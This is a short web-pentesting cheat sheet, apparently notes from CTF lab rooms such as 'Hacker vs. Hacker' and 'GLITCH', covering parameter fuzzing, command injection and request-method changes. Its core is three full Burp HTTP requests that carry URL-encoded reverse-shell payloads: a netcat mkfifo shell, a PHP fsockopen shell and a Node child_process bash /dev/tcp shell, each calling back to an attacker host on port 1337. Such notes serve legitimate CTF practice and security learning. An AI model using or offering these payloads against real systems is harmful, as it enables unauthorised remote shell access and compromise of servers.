Find Parameters
Try using burp suite intruder to brute force to find other parameters
Command Injection
Examples
Hacker vs. Hacker
Started using Burp while testing out payloads to url-encode payloads more easy.
Kali
Started using Burp while testing out payloads to url-encode payloads more easy.
Burp
GET /cvs/shell.pdf.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.9.104+1337+>/tmp/f HTTP/1.1
Host: 10.10.21.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Bypass Filters - ;
try adding ; and then a command.
Burp Request
GET /index.php?path=;php+-r+'$sock%3dfsockopen("$KALI",1337)%3bexec("sh+<%263+>%263+2>%263")%3b' HTTP/1.1
Host: 10.10.128.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Change Request Type
Examples
GLITCH
Change the request from GET to POST and it gives an interesting message
Running the below shows it is vulnerable
If it works try getting a shell
Kali
Burp
POST /api/items?cmd=require("child_process").exec('bash+-c+"bash+-i+>%26+/dev/tcp/$KALI/1337+0>%261"') HTTP/1.1
Host: 10.10.22.153
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: token=value
Upgrade-Insecure-Requests: 1
Exploiting Vulnerable Password Reset Logic(OTP)
Examples
Exploiting HTTP Basic Authentication
Examples
Last updated
